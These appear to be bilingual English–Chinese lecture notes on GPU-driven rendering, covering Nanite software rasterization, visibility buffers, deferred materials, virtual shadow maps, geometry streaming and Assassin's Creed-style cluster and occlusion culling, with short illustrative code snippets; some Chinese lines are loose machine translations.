      • Output 2x2 pixel quads

        输出 2x2 像素四边形

      • Highly parallel in pixels not triangles

        像素高度平行,而非三角形

    • Modern GPUs setup 4 tris/clock max

      现代 GPU 设置最大 4 tris / 时钟

      • Outputting SV_PrimitiveID makes it even worse

        输出 SV_PrimitiveID 会使情况变得更糟

    • Can we beat the HW rasterizer in SW?

      我们能在软件中击败硬件光栅化器吗?

    3x faster!

    webp

    Nanite – Rasterization

    Nanite-光栅化

    • Only rasterize 1 pixel when the triangle size smaller than 1 pixel in Shader function

      当着色器函数中的三角形尺寸小于 1 像素时,仅光栅化 1 像素

    • We will save 3 pixels compute resources if the triangle only covered in 1 pixel

      如果三角形只覆盖 1 个像素,我们将节省 3 个像素的计算资源

    • Reconstruct derivatives for ddx/ddy

      重建 ddx/ddy 的导数

    webp

    Scanline Software Rasterizer

    扫描线软件光栅化器

    • Per-cluster based rasterization selection

      基于每个集群的光栅化选择

      • All edges of cluster <18 pixels are SW rasterized

        所有小于 18 像素的簇边缘都进行了 SW 光栅化

    • Iterate over the rect tests a lot of pixels

      迭代 rect 测试大量像素

    • Best case half are covered

  最好情况下也只有一半的像素被覆盖

    • Worst case none are

      最坏的情况是没有

    • Scanline method is a choice

      扫描线方法是一种选择
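A minimal scanline fill over a screen-space triangle, as a sketch of the alternative to testing every pixel in the bounding rect (pixel-center conventions are simplified here):

def rasterize_scanline(v0, v1, v2, write_pixel):
    # For each scanline in the y-range, intersect the three edges and
    # fill only between min/max x -- no wasted coverage tests in the rect.
    ys = [v[1] for v in (v0, v1, v2)]
    for y in range(int(min(ys)), int(max(ys)) + 1):
        xs = []
        for (x0, y0), (x1, y1) in ((v0, v1), (v1, v2), (v2, v0)):
            if y0 != y1:
                t = (y + 0.5 - y0) / (y1 - y0)
                if 0.0 <= t < 1.0:
                    xs.append(x0 + t * (x1 - x0))
        if len(xs) >= 2:
            for x in range(round(min(xs)), round(max(xs)) + 1):
                write_pixel(x, y)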

    webp

    How To Do Depth Test?

    如何进行深度测试?

    • Don’t have ROP or depth test hardware

      没有 ROP 或深度测试硬件

    • Need Z-buffering

      需要 Z-缓冲

      • Can’t serialize at tiles

        无法在图块上序列化

      • Many tris may be in parallel for single tile or even single pixel

        对于单个图块甚至单个像素,许多 tris 可能是并行的

    • Use 64 bit atomics!

      使用 64 位原子!

NumberBits    32       25                        7
Type          Depth    Visible cluster index     Triangle index
类型          深度      可见集群索引                三角形索引
    • InterlockedMax

  InterlockedMax(原子最大值)

      • Visibility buffer shows its true power

        可见性缓冲显示其真正的力量
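A sketch of why one 64-bit atomic max doubles as the depth test: with depth in the top bits, the comparison orders by depth first (assuming an encoding where a larger depth value means closer, as with reversed-Z):

def pack_visbuffer64(depth32, cluster_index25, triangle_index7):
    # [63..32] depth | [31..7] visible cluster index | [6..0] triangle index
    return (depth32 << 32) | (cluster_index25 << 7) | triangle_index7

def interlocked_max(vis_buffer, pixel, packed):
    # models InterlockedMax on a 64-bit UAV texel: the nearest fragment's
    # (depth, cluster, triangle) tuple survives, with no ROP hardware at all
    vis_buffer[pixel] = max(vis_buffer[pixel], packed)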

    Nanite Visibility Buffer

    Nanite 可见性缓冲区

NumberBits    32       25                        7
Type          Depth    Visible cluster index     Triangle index
类型          深度      可见集群索引                三角形索引

    webp

    • Write geometry data to screen

      将几何数据写入屏幕

      • Depth : InstanceID : TriangleID

        深度:实例 ID:三角形 ID

    • Material shader per pixel:

      每像素材质着色器:

      • Load VisBuffer

        加载 VisBuffer

      • Load instance transform

        加载实例转换

      • Load 3 vert indexes

    加载 3 个顶点索引

      • Load 3 positions

        加载 3 个位置

      • Transform positions to screen

        将位置转换到屏幕

      • Derive barycentric coordinates for pixel

        推导像素的重心坐标

      • Load and lerp attributes

        加载和 lerp 属性

    • Sounds crazy? Not as slow as it seems

      听起来很疯狂?没有看起来那么慢

      • Lots of cache hits

        大量缓存命中

      • No overdraw or pixel quad inefficiencies

        没有过度绘制或像素四边形效率低下

    • Material pass writes GBuffer

  材质通道(material pass)写入 GBuffer

      • Integrates with rest of our deferred shading renderer

        与我们的其他延迟着色渲染器集成

    • Draw all opaque geometry with 1 draw

      用 1 次绘制绘制所有不透明几何体

      • Completely GPU driven

        完全由 GPU 驱动

      • Not just depth prepass

    不仅仅是深度预通道(depth prepass)

      • Rasterize triangles once per view

        每个视图对三角形进行一次栅格化

    Hardware Rasterization

    硬件光栅化

    • What about big triangles?

      大三角形呢?

    • Use HW rasterizer

      使用硬件光栅化器

    • Choose SW or HW per cluster

      为每个集群选择软件或硬件

    • Also uses 64b atomic writes to UAV

  同样使用 64 位原子操作写入 UAV

    webp

    Imposters for Tiny Instances

微小实例的替身(Imposters)

    • 12 x 12 view directions in atlas

      图集中 12 x 12 个视图方向

      • XY atlas location octahedral mapped to view direction

        XY 图集位置八面体映射到视图方向

      • Dithered direction quantization

        离散方向量化

    • 12 x 12 pixels per direction

      每个方向 12 x 12 像素

      • Orthogonal projection

        正交投影

      • Minimal extents fit to mesh AABB

        最小范围适合网眼 AABB

      • 8:8 Depth, TriangleID

        8:8 深度,三角形 ID

      • 40.5KB per mesh always resident

        每个网格始终驻留 40.5KB

    • Ray march to adjust parallax between directions

      光线行进以调整方向之间的视差

      • Few steps needed due to small parallax

        由于视差小,需要很少的步骤

    • Drawn directly from instance culling pass

      直接从实例剔除过程中提取

      • Bypassing visible instances list

        绕过可见实例列表

    • Would like to replace with something better

      想换个更好的

    webp

    Rasterizer Overdraw

光栅化器的过度绘制(Overdraw)

    • No per triangle culling

      无每个三角形的剔除

    • No hardware HiZ culling pixels

      无硬件 HiZ 剔除像素

    • Our software HZB is from previous frame

      我们的软件 HZB 来自上一帧

      • Culls clusters not pixels

        剔除聚类而非像素

      • Resolution based on cluster screen size

        基于集群屏幕大小的分辨率

    • Excessive overdraw from:

  过度绘制的来源:

      • Large clusters

        大型集群

      • Overlapping clusters

        重叠集群

      • Aggregates

    聚合体(Aggregates)

      • Fast motion

        快速运动

    • Overdraw expense

  过度绘制的开销

      • Small tris: Vertex transform and triangle setup bound

    小三角形:瓶颈在顶点变换和三角形装配(setup)

      • Medium tris: Pixel coverage test bound

    中等三角形:瓶颈在像素覆盖测试

      • Large tris: Atomic bound

    大三角形:瓶颈在原子写入

    webp

    Nanite Deferred Material

Nanite 延迟材质

    Deferred Material

延迟材质

    • Nanite want to support full artist created pixel shaders

      Nanite 希望支持完全由艺术家创建的像素着色器

    • In theory, all materials could be applied in a single pass, but there are complexities and inefficiencies there

      理论上,所有材质都可以一次性使用,但存在复杂性和效率低下的问题

    webp

    Material Shading

    材质着色

    • Common method

      常用方法

      • Draw a full screen quad per unique material

        为每种独特材质绘制全屏四边形

      • Skip pixels not matching this material

        跳过与此材质不匹配的像素

    • Disadvantages

      缺点

      • CPU unaware if some materials have no visible pixels (unfortunate side effect of GPU driven)

        CPU 不知道某些材质是否没有可见像素(GPU 驱动的不幸副作用)

      • So unnecessary drawing instructions will be committed

    因此会提交不必要的绘制指令

    Shading Efficiency

    遮光效率

    • Hardware depth test!

      硬件深度测试!

      • Convert material ID to depth value

        将材质 ID 转换为深度值
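A sketch of that conversion (one representative depth per material slot; the exact encoding here is an assumption):

def material_slot_to_depth(slot, max_slots=1 << 14):
    # Draw a full-screen pass at this depth with DepthFunc == EQUAL and the
    # depth unit rejects every pixel whose material-depth value differs.
    assert 0 <= slot < max_slots
    return (slot + 0.5) / max_slots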

    webp

    Shading

    • Then draw a full screen quad and set depth test function to “equal”, so unmatched pixels will be discarded

      然后绘制一个全屏四边形,并将深度测试功能设置为“相等”,这样不匹配的像素将被丢弃

    • But full screen quad is not necessary and can be improved!

  但全屏四边形并不是必需的,还可以改进!

    Material Sorting with Tile-Based Rendering

    基于平铺渲染的材质排序

    • We can do a screen tile material classification

  我们可以按屏幕图块(tile)做材质分类

    • For a certain material, exclude tiles that do not contain this material

      对于某种材质,排除不包含此材质的瓷砖

    webp

    Material Classify

    材质分类

    webp

    Material Classify - Material Tile Remap Table

材质分类——材质图块重映射表

    • Finally forms a material and tile remap table

      最后形成材质和瓷砖重映射表

    • Get the number of tiles based on the screen resolution and pack 32 tiles into a group

      根据屏幕分辨率获取图块数量,并将 32 个图块打包成一组

    • ‘MaterialRemapCount’ means the number of groups

      “MaterialRemapCount” 是指组的数量

    • Record the tiles in which a material is located by marking it by bit

      通过逐点标记来记录材质所在的瓷砖

    • This table can be used to calculate the tile position to render to

      此表可用于计算要渲染的图块位置
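A sketch of building that remap table, with 32 tiles packed per 32-bit word as described above (the data layout is illustrative):

def build_material_tile_remap(tile_materials, num_materials):
    # tile_materials: for each screen tile, the set of material slots in it
    num_tiles = len(tile_materials)
    words = (num_tiles + 31) // 32            # 'MaterialRemapCount' groups
    remap = [[0] * words for _ in range(num_materials)]
    for tile, mats in enumerate(tile_materials):
        word, bit = divmod(tile, 32)
        for m in mats:
            remap[m][word] |= 1 << bit        # mark the tile by its bit
    return remap                              # per material: tiles to render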

    webp

    Deferred Material Overall Process

延迟材质整体流程

    • Generate material resolve texture

      生成材质解析纹理

    • Generate material depth texture

      生成材质深度纹理

    • Classify screen tile materials

  对各屏幕图块的材质进行分类

    • Generate G-Buffer

      生成 G-缓冲区

      • This will be output to the g-buffer to match with the rest of the pipeline

        这将被输出到 g-buffer,以与管道的其余部分相匹配

      • Commit drawing commands per material

        按材质提交绘图命令

    webp

void UnpackMaterialResolve(
    uint Packed,
    out bool IsNanitePixel,
    out bool IsDecalReceiver,
    out uint MaterialSlot)
{
    IsNanitePixel   = BitFieldExtractU32(Packed,  1,  0) != 0;
    MaterialSlot    = BitFieldExtractU32(Packed, 14,  1);
    IsDecalReceiver = BitFieldExtractU32(Packed,  1, 15) != 0;
}

    Shadows

    Micropoly Level Detail for Shadows

    阴影的微多层细节

    webp

    Nanite Shadows - Ray Trace?

    Nanite 阴影-射线追踪?

    • Ray trace?

      射线追踪?

    • There are more shadow rays than primary since there are on average more than 1 light per pixel

      由于每个像素平均有 1 个以上的光,因此阴影光线比主光线多

    • Custom triangle encoding

      自定义三角形编码

    • No partial BVH updates

      无部分 BVH 更新

    • HW triangle formats + BLAS (bottom level acceleration structure) currently are 3-7x the size of Nanite data

      HW 三角形格式 + BLAS(底层加速结构)目前是 Nanite 数据大小的 3-7x

    webp

    RTX 40XX,50XX? Radeon RX 70XX…?

    Recap Cascaded Shadow Map

    回顾级联阴影图

    • Relatively coarse LOD control

      LOD 控制相对粗糙

    • If better shadow detail is desired, there is still significant memory consumption

      如果需要更好的阴影细节,仍然会消耗大量内存

    webp

    Sample Distribution Shadow Maps

    示例分布阴影图

    • Gives a better cascaded map coverage by analysing the range of screen pixel depths

      通过分析屏幕像素深度范围,提供更好的级联地图覆盖率

    • An optimized cascaded shadow map but still has coarse LOD control

      优化的级联阴影贴图,但仍具有粗略的 LOD 控制

    webp

    webp

    Virtual Shadow Map - A Cached Shadow System!

    虚拟阴影地图-缓存的阴影系统!

    • Most lights don’t move, should be cached as much as possible

      大多数灯光不会移动,应尽可能缓存

    webp

    Virtual Shadow Maps

    虚拟阴影地图

    • 16k x 16k virtual shadow map for each light (exception, point light with 6 VSMs)

      每个灯光的 16k x 16k 虚拟阴影贴图(具有 6 个 VSM 的点光源除外)

    webp

    Different Light Type Shadow Maps

    不同的灯光类型阴影贴图

    webp

    Shadow Page Allocation

    影子页面分配

    • Only visible shadow pixels need to be cached

      只需要缓存可见的阴影像素

      • For each pixel on screen

        对于屏幕上的每个像素

      • For all lights affecting this pixel

        对于影响此像素的所有灯光

      • Project the position into shadow map space

        将位置投影到阴影贴图空间

      • Pick the mip level where 1 texel matches the size of 1screen pixel

        选择 1 个纹理像素与 1 个屏幕像素大小匹配的 mip 级别

      • Mark the page as needed

        根据需要标记页面

      • Allocate physical page space for uncached pages

        为未缓存的页面分配物理页面空间
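The marking step from the list above as a sketch (projection and light-lookup helpers are passed in as placeholders; a 16k map with 128-pixel pages is assumed):

import math

def mark_needed_pages(screen_pixels, lights, lights_affecting,
                      project_to_shadow, vsm_size=16384, page_size=128):
    needed = set()
    max_mip = int(math.log2(vsm_size // page_size))
    for pixel in screen_pixels:
        for light in lights_affecting(pixel, lights):
            # (u, v) in shadow-map space plus how many texels one screen
            # pixel covers there at mip 0
            u, v, texels_per_pixel = project_to_shadow(pixel, light)
            # pick the mip where 1 shadow texel covers ~1 screen pixel
            mip = min(max(int(math.log2(max(texels_per_pixel, 1.0))), 0), max_mip)
            size = vsm_size >> mip
            needed.add((light, mip,
                        int(u * size) // page_size, int(v * size) // page_size))
    return needed   # pages not already cached get physical pages allocated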

    Shadow Page Table and Physical Pages Pool

    影子页表和物理页池

    webp

    Shadow Page Cache Invalidation

阴影页缓存失效

    • Camera movement, if the movement is relatively smooth, there will not be many pages to update

      相机移动,如果移动相对平稳,就不会有很多页面需要更新

    • Any light movement or rotation will invalidate all cached pages for that light

      任何灯光移动或旋转都会使该灯光的所有缓存页面无效

    • Geometry that casts shadows moving, or being added or removed from the scene will invalidate any pages that overlap its bounding box from the light’s perspective

      投射阴影的几何体在场景中移动、添加或删除,将使从灯光角度与其边界框重叠的任何页面无效。

    • Geometry using materials that may modify mesh positions

      使用可能修改网格位置的材质的几何体

    Shadow Demo

    webp

    Conclusions

    结论

    • Number of shadow pages proportional to screen pixels

      与屏幕像素成比例的阴影页数

    • Shadow cost scales with resolution and number of lights per pixel

      阴影成本随分辨率和每像素的灯光数量而变化

    webp

    Streaming and Compression

    流媒体和压缩

    Streaming

    流媒体

    • Virtualized geometry

      虚拟几何体

      • Unlimited geometry at fixed memory budget

        固定内存预算下的无限几何图形

    • Conceptually similar to virtual texturing

      概念上类似于虚拟纹理

      • GPU requests needed data then CPU fulfills them.

        GPU 请求所需的数据,然后 CPU 完成它们。

  • Unique challenge: there must be no cracks in the geometry

        独特的挑战:几何体中不得有裂纹

    • Cut DAG at runtime to only loaded geometry

      在运行时将 DAG 剪切为仅加载的几何体

      • Needs to always be a valid cut of full DAG

        需要始终是完整 DAG 的有效切割

      • Similar to LOD cutting. No cracks

        类似于 LOD 切割。无裂纹

    webp

    Paging

    分页

    • Fill fixed-sized pages with groups

      用组填充固定大小的页面

    • Based on spatial locality to minimize pages needed at runtime

      基于空间局部性,以最小化运行时所需的页面

      • Sort groups by mip and spatial locality

        按 mip 和空间位置对组进行排序

    • Root page (64k)

      根页面(64k)

      • First page contains top lod level(s) of DAG

        第一页包含 DAG 的顶级 lod 级别

      • Always resident on GPU so we always have something to render

        始终驻留在 GPU 上,所以我们总是有东西要渲染

    • Streaming Page (128k)

      流媒体页面(128k)

      • Other lod levels of cluster groups

        集群组的其他 lod 水平

      • Life time is managed by LRU on CPU

        寿命由 CPU 上的 LRU 管理

    • Page contents:

      页面内容:

      • Index data,Vertex data, Bounds, LOD info, Material tables, etc.

        索引数据、顶点数据、边界、LOD 信息、材质表等。

    webp

    Memory representation

    内存表示

    Vertex quantization and encoding

    顶点量化和编码

    • Global quantization

      全局量化

      • A combination of artist control and heuristics

        艺术家控制和启发式的结合

      • Clusters store values in local coordinates that is relative to value min/max range

        集群将值存储在相对于值最小/最大范围的局部坐标中

    • Per-cluster custom vertex format

      每簇自定义顶点格式

      • Uses minimum number of bits per component: ceil(log2(range))

        使用每个组件的最小位数:ceil(log2(range))

      • Just a string of bits, not even byte aligned

        只是一串比特,甚至没有字节对齐

    • Decoded using GPU bit-stream reader because of divergent encode format between clusters

      由于集群之间的编码格式不同,使用 GPU 比特流读取器进行解码
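A sketch of the per-cluster format decision (a fixed precision step is assumed here; the engine derives it from artist settings and heuristics):

import math

def cluster_position_format(positions, step=0.01):
    # positions: (x, y, z) floats of one cluster; returns per-axis
    # (min, step, bits), with bits = ceil(log2(range)) of quantized steps
    fmt = []
    for axis in range(3):
        vals = [p[axis] for p in positions]
        lo, hi = min(vals), max(vals)
        steps = max(1, round((hi - lo) / step))
        bits = max(1, math.ceil(math.log2(steps + 1)))
        fmt.append((lo, step, bits))
    return fmt

def quantize(value, lo, step):
    # values are later bit-packed back to back, not even byte aligned
    return round((value - lo) / step)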

    webp

    Disk Representation

    磁盘表示法

    • Hardware LZ decompression

      硬件 LZ 解压

      • In consoles now and on its way to PC with DirectStorage

    现已用于游戏主机,并正随 DirectStorage 进入 PC

      • Unbeatably fast, but general purpose

        速度无与伦比,但用途广泛

      • String deduplication and entropy coding

        字符串重复数据删除和熵编码

    • For better compression

      为了更好的压缩

      • Domain-specific transforms

        特定于域的转换

  • Focus on redundancies not already captured by LZ, massaging the data to better fit how LZ compression works

        关注 LZ 尚未捕获的冗余,并对数据进行处理,以更好地适应 LZ 压缩方式

    • Transcode on the GPU

      GPU 上的转码

      • High throughput for parallel transforms, currently runs at ~50GB/s with fairly unoptimized code on PS5

        并行转换的高吞吐量,目前在 PS5 上以约 50GB/s 的速度运行,代码相当未优化

      • Powerful in combination with hardware LZ

        与硬件 LZ 结合使用功能强大

      • Eventually stream data directly to GPU memory

        最终将数据直接流式传输到 GPU 内存

    Results: Lumen in the Land of Nanite

结果:《Lumen in the Land of Nanite》

    • 433M Input triangles, 882M Nanite triangles

      433M 输入三角形,882M Nanite 三角形

    • Raw data: 25.90GB Memory format: 7.67GB

      原始数据:25.90GB 内存格式:7.67GB

    • Compressed: 6.77GB Compressed disk format: 4.61GB

      压缩:6.77GB 压缩磁盘格式:4.61GB

    • ~20% improvement since Early Access

      自早期访问以来提高了约 20%

    • 5.6 bytes per Nanite triangle, 11.4 bytes per input triangle

      每个 Nanite 三角形 5.6 个字节,每个输入三角形 11.4 个字节

    • 1M triangles = ~10.9MB on disk

      1M 三角形 = 磁盘上约 10.9MB

    webp

    Welcome to Billions of Triangles World

    欢迎来到亿万三角形世界

    Jungle of Nanite Geometries

    Nanite 几何丛林

    webp

    References

    ]]>
    + 资源

    课程

    “Long” Pipeline of Traditional Rendering

    传统渲染的“长”管道

    • Compute unit works with graphics processor and rasterizer

      计算单元与图形处理器和光栅化器配合使用

    • It’s a series of data processing units arranged in a chain like manner

      它是一系列以链式方式排列的数据处理单元

    • Difficult to fully fill the GPU

      很难完全填满 GPU

    webp

    Jungle of Direct Draw Graphics API

    直接绘制图形的丛林 API

    Explosion of DrawCalls:

    DrawCalls 激增:

    • Meshes x RenderStates x LoDs x Materials x Animations

      网格 x 渲染状态 x LoD x 材质 x 动画

    webp

    Problem 1: A traditional DrawIndexedInstanced command requires 5 arguments assigned on CPU

    问题 1:传统的 DrawIndexed Instanced 命令需要在 CPU 上分配 5 个参数

    webp

    Problem 2: Driver state switching overhead between amount of draw commands

    问题 2:在绘制命令数量之间切换驱动程序状态的开销

    Bottleneck of Traditional Rendering Pipeline

    传统渲染管道的瓶颈

    webp

    When rendering complicated scene with dense geometries and many materials

    渲染具有密集几何体和许多材质的复杂场景时

    • High CPU overload

      CPU 过载严重

    • Frustum/Occlusion Culling

      颅骨/闭塞切除术

    • Prepare drawcall

      准备图纸

    • GPU idle time

      GPU 空闲时

    • CPU can not follow up GPU

      CPU 无法跟踪 GPU

    • High driver overhead

      驾驶员头顶高度

    • GPU state exchange overhead when solving large amount of drawcalls

      解决大量 drawcall 时的 GPU 状态交换开销

    Compute Shader - General Computation on GPU

    计算着色器-GPU 上的通用计算

    • High-speed general purpose computing and takes advantage of the large numbers of parallel processors on the GPU

      高速通用计算,并利用 GPU 上的大量并行处理器

    • Less overhead to graphics pipeline

      减少图形管道的开销

    • Just one stage in pipeline

      只是管道中的一个阶段

    webp

    Draw-Indirect Graphics API

    绘图-直接图形 API

    Advantage:

    优点:

    • Allow you to specify parameters to draw commands from a GPU buffer, or via GPU compute program

      允许您指定参数以从 GPU 缓冲区或通过 GPU 计算程序绘制命令

    • “Draw-Indirect” command can merge a lot of draw calls into one single draw call, even with different mesh topology

    “绘制间接”命令可以将许多绘制调用合并到一个绘制调用中,即使使用不同的网格拓扑

    Notice:

    注意:

    • The actual name of “Draw-Indirect” is different in each graphics platform, but they act as the same role. (e.g.
      vkCmdDrawIndexedIndirect(Vulkan), ExecuteIndirect(D3D12), …)

      “绘制间接”的实际名称在每个图形平台中都不同,但它们扮演着相同的角色。

    webp

    GPU Driven Render Pipeline – DrawPrimitive vs. DrawScene

    GPU 驱动的渲染管道——DrawPrimitive 与 DrawScene

    • GPU controls what objects are actually rendered

      GPU 控制实际渲染的对象

      • Lod selection, visibility culling on GPU

        Lod 选择,GPU 上的可见性剔除

    • No CPU/GPU roundtrip

      无 CPU/GPU 往返

      • CPU do not touch any GPU data

        CPU 不接触任何 GPU 数据

    • N viewports/frustums

      N 个视口/视锥

    Frees up the CPU to be used on other things, ie. AI

    释放 CPU 以用于其他事情

    webp

    GPU Driven Pipeline in Assassins Creed

    《刺客信条》中的 GPU 驱动流水线

    Motivation

    动机

    • Massive amounts of geometry: architecture, seamless interiors, crowds

      大量的几何形状:建筑、无缝的内部、人群

    Use mesh cluster rendering to

    使用网格簇渲染

    • Allow much more aggressive batching and culling granularity

      允许更严格的批处理和剔除粒度

    • Render different meshes efficiently with a single indirect draw command

      使用单个间接绘制命令高效渲染不同的网格

    webp

    Mesh Cluster Rendering

    网格簇渲染

    • Require

      需要

      • Fixed cluster topology (E.g. 64 triangles in Assassin Creed or 128 triangles in Nanite)

        固定集群拓扑(例如,刺客信条中的 64 个三角形或 Nanite 中的 128 个三角形)

      • Split & rearrange all meshes to fit fixed topology (insert degenerate triangles)

        拆分并重新排列所有网格以适应固定拓扑(插入退化三角形)

      • Fetch vertices manually in VS

        在 VS 中手动获取顶点

    • Key Implementation

      关键实施

      • Cull clusters by their bounding on GPU (usually by compute shader)

        通过 GPU 上的边界(通常通过计算着色器)剔除集群

      • GPU outputs culled cluster list & drawcall args

        GPU 输出精选集群列表和绘图调用参数

      • Draw arbitrary number of visible clusters in single drawcall

        在单个 drawcall 中绘制任意数量的可见簇

    webp

    GPU Driven Pipeline in Assassins Creed

    《刺客信条》中的 GPU 驱动流水线

    • Overview

      概述

      • Offload more work from CPU to GPU

        将更多工作从 CPU 转移到 GPU

      • But not perfectly “draw scene” command, can only draw objects with the same material together

        但不是完美的“绘制场景”命令,只能将具有相同材质的对象绘制在一起

    webp

    Works on CPU side

    CPU 端的工作

    webp

    • Perform very coarse frustum culling and then batch all unculled objects together by material

      执行非常粗略的截头体剔除,然后按材质将所有未剔除的对象批处理在一起

      • CPU quad tree culling

        CPU 四叉树剔除

      • Drawcalls are merged based on a hash built from non-instanced data (e.g. material, render state, …).

        基于非实例化数据(例如材质、渲染状态等)构建的哈希来合并 drawcall。

    • Update per-instance data (e.g. transform, LOD factor, …); static instances are persistent

      更新每实例数据(例如变换、LOD 因子等);静态实例是持久的

    GPU Instance Culling

    GPU 实例剔除

    • Output cluster chunks after instance culling

      实例剔除后输出集群块

    • Use cluster chunk expansion (64 clusters in a chunk) to balance GPU threads within a wavefront.

      使用簇块(cluster chunk)展开(一个块中 64 个簇)来平衡一个 wavefront 内的 GPU 线程。

    webp

    GPU Cluster Culling

    GPU 集群剔除

    • Cluster culling by cluster bounding box

      通过聚类边界框进行聚类剔除

      • output cluster list

        输出集群列表

    • Triangle backface culling

      三角形背面剔除

      • output triangle visibility result and write offsets in new index buffer

        输出三角形可见性结果,并写入新索引缓冲区中的偏移量

    webp

    Index Buffer Compaction

    索引缓冲区压缩

    • Prepare an empty index buffer (8 MB) and pre-assign space for each mesh instance

      准备一个空的索引缓冲区(8 MB),并为每个网格实例预分配空间

    • Copy the visible triangles' indices into the new index buffer in parallel

      将可见三角形的索引并行复制到新索引缓冲区中

    • Index buffer compaction and multi-draw rendering can be interleaved because of the fixed size of the new index buffer (8 MB)

      由于新索引缓冲区的大小固定(8 MB),索引缓冲区压缩和多重绘制渲染可以交错进行

    webp

    Codec Triangle Visibility in Cube: Backface Culling

    在立方体中编码三角形可见性:背面剔除

    • Bake triangle visibility for the pixel frustums of a cluster-centered cubemap

      为以簇为中心的立方体贴图的各像素视锥烘焙三角形可见性

    • Cubemap lookup based on camera

      基于相机的立方体贴图查找

    • Fetch 64 bits for visibility of all triangles in cluster

      获取 64 位以查看集群中所有三角形的可见性

    webp

    webp

    Occlusion Culling for Camera and Shadow

    相机和阴影的遮挡剔除

    Occlusion Depth Generation

    遮挡深度生成

    • Depth pre-pass with best occluders in full resolution

      全分辨率下用最佳遮挡体做深度预通道(depth pre-pass)

      • Choose best occluders by artist or heuristic (e.g. 300 occluders)

        由美术或启发式方法选出最佳遮挡体(例如 300 个)

      • Holes can come from rejected occluders (bad occluder selection or alpha-tested geometry)

        空洞可能来自被排除的遮挡体(遮挡体选择不当或 alpha 测试几何体)

    • Downsample the best-occluder depth to 512x256

      将最佳遮挡体深度降采样到 512x256

    • Then combined with reprojection of 1/16 low resolution version of last frame’s depth

      然后结合最后一帧深度的 1/16 低分辨率版本的重新投影

      • Last frame's depth can help fill the holes.

        上一帧的深度有助于填补空洞。

      • False occlusion is possible from large moving objects in the last frame's depth, but it works in most cases.

        上一帧深度中的大型运动物体可能造成错误遮挡,但在大多数情况下仍然有效。

    • Generate hierarchy-Z buffer for GPU culling

      生成用于 GPU 剔除的分层 Z-缓冲区

    webp

    Two-Phase Occlusion Culling

    两阶段遮挡剔除

    1st phase

    第一阶段

    Cull objects & clusters using last frame’s depth pyramid

    使用上一帧的深度金字塔剔除对象和簇

    Render visible objects

    渲染可见对象

    2nd phase

    第二阶段

    Refresh depth pyramid

    刷新深度金字塔

    Test culled objects & clusters

    测试剔除的物体和集群

    Render false negatives

    渲染假阴性
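
    A minimal sketch of the two phases (the hzb objects and the render callback are hypothetical stand-ins for GPU passes):

    # Two-phase occlusion culling, CPU-side pseudocode for illustration.
    def two_phase_culling(objects, last_frame_hzb, render, build_hzb):
        # Phase 1: test everything against LAST frame's depth pyramid.
        visible, maybe_occluded = [], []
        for obj in objects:
            (visible if last_frame_hzb.is_visible(obj.bounds) else maybe_occluded).append(obj)
        render(visible)  # draw what we believe is visible

        # Phase 2: refresh the pyramid from what was just drawn, re-test only the
        # objects culled in phase 1, and draw the false negatives.
        current_hzb = build_hzb()
        false_negatives = [o for o in maybe_occluded if current_hzb.is_visible(o.bounds)]
        render(false_negatives)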

    webp

    Crazy Stressing Cases

    疯狂压力案例

    • “Torture” unit test scene: 250,000 separate moving objects

      “酷刑”单元测试场景:250,000 个独立运动的物体

    • 1GB of mesh data (10k+ meshes)

      1GB 网格数据(10k+ 网格)

    • 8k² texture cache atlas

      8k² 纹理缓存图集

    • DirectX 11 code path

      DirectX 11 代码路径

    • 64 vertex clusters (strips)

      64 个顶点簇(条带)

    • No ExecuteIndirect / MultiDrawIndirect

      没有使用 ExecuteIndirect / MultiDrawIndirect

    • Only two DrawInstancedIndirect calls

      只有两个 DrawInstancedIndirect 调用

    webp

    webp

    Fast Occlusion for Shadow

    阴影的快速遮挡剔除

    For each cascade

    对于每个级联

    • Generate camera depth reprojection (64x64 pixel)

      生成相机深度重投影(64x64 像素)

    • Then combine with last frame’s shadow depth reprojection

      然后结合上一帧的阴影深度重投影

    • Generate hierarchy-Z buffer for GPU culling

      生成用于 GPU 剔除的分层 Z-缓冲区

    webp

    Camera Depth Reprojection for Shadow Culling

    用于阴影剔除的相机深度重投影

    Motivation

    动机

    • It is essential to cull objects in the light view that do not cast a visible shadow

      在光源视角下,剔除那些不会投下可见阴影的物体是至关重要的

    Implementation

    实施

    • Get camera visible areas that may appear shadow

      获取可能出现阴影的相机可见区域

    • For each 16x16 screen tile, construct a cube (each yellow frustum) according to the min/max depth in this tile.

      对于每个 16x16 的屏幕图块,根据该图块中的最小/最大深度构造一个立方体(每个黄色平截头体)。

    • Render max depth of these cubes in the light view

      在灯光视图中渲染这些立方体的最大深度

    • All objects farther than this depth can be culled, because they certainly do not contribute to a visible shadow

      所有比该深度更远的物体都可以被剔除,因为它们肯定不会产生可见的阴影

    webp

    Best Cases of Camera Depth Reprojection

    相机深度重投影的最佳案例

    webp

    Visibility Buffer

    可见性缓冲区

    Recap - Deferred Shading, G-Buffer

    回顾-延迟着色,G-缓冲区

    • Forward rendering shades all fragments in triangle-submission order

      前向渲染按三角形提交顺序为所有片元着色

    • Wastes rendering power on pixels that don’t contribute to the final image

      在对最终图像没有贡献的像素上浪费渲染能力

    • Deferred shading solves this problem in 2 steps:

      延迟着色通过两个步骤解决了这个问题:

    • First, surface attributes are stored in screen buffers -> G-Buffer

      首先,曲面属性存储在屏幕缓冲区 -> G-Buffer 中

    • Second, shading is computed for visible fragments only

      其次,仅对可见片段计算着色

    Deferred Shading

    延迟渲染

    webp

    Fat G-Buffer of Deferred Shading

    延迟着色的 Fat G-Buffer

    • However, deferred shading increases memory bandwidth consumption:

      但是,延迟着色会增加内存带宽消耗:

      • Screen buffers for: normal, depth, albedo, material ID, …

        屏幕缓冲区存放:法线、深度、反照率、材质 ID,…

      • G-Buffer size becomes challenging at high resolutions

        G-缓冲区大小在高分辨率下变得具有挑战性

    webp

    Challenges of Complex Scene

    复杂场景的挑战

    webp

    webp

    Visibility Buffer - Filling

    可见性缓冲区-填充

    • Visibility Buffer generation step

      可见性缓冲区生成步骤

    • For each pixel in screen:

      对于屏幕中的每个像素:

      • Pack (alpha masked bit, drawID, primitiveID) into one 32-bit UINT

        将(alpha 掩码位、drawID、primitiveID)打包成一个 32 位的 UINT

      • Write that into a screen-sized buffer

        将其写入屏幕大小的缓冲区

    • The tuple (alpha masked bit, drawID, primitiveID) will allow a shader to access the triangle data in the shading step

      元组(alpha 掩码位、drawID、primitiveID)将允许着色器在着色步骤中访问三角形数据
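
    A minimal sketch of that packing; the exact bit split is not given in the slides, so the widths below (1 alpha bit, 8 drawID bits, 23 primitiveID bits) are an assumption for illustration:

    # Assumed bit widths, summing to 32.
    ALPHA_BITS, DRAW_BITS, PRIM_BITS = 1, 8, 23

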